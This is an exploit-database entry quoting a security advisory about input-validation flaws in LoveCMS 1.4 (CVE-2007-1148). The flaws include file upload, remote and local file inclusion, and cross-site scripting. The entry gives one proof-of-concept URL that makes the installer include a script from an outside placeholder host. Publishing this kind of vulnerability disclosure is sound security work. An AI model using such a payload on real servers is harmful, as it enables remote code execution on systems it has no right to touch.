source: http://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. An attacker can exploit these issues to steal cookie-based authentication credentials, upload an arbitrary PHP file, execute the file on the vulnerable computer in the context of the webserver process, retrieve arbitrary files from the vulnerable system in the context of the affected application, and delete arbitrary files on the server. http://www.example.com/lovecms/install/index.php?step=http://example2.com/boum.txt?
Related ExploitsTrying to match CVEs (1): CVE-2007-1148
Trying to match OSVDBs (1): 33516
Trying to match setup file: 5f7f205ee6a1dfb2f6cc3f7d06b3d27d
Other Possible E-DB Search Terms: LoveCMS 1.4, LoveCMS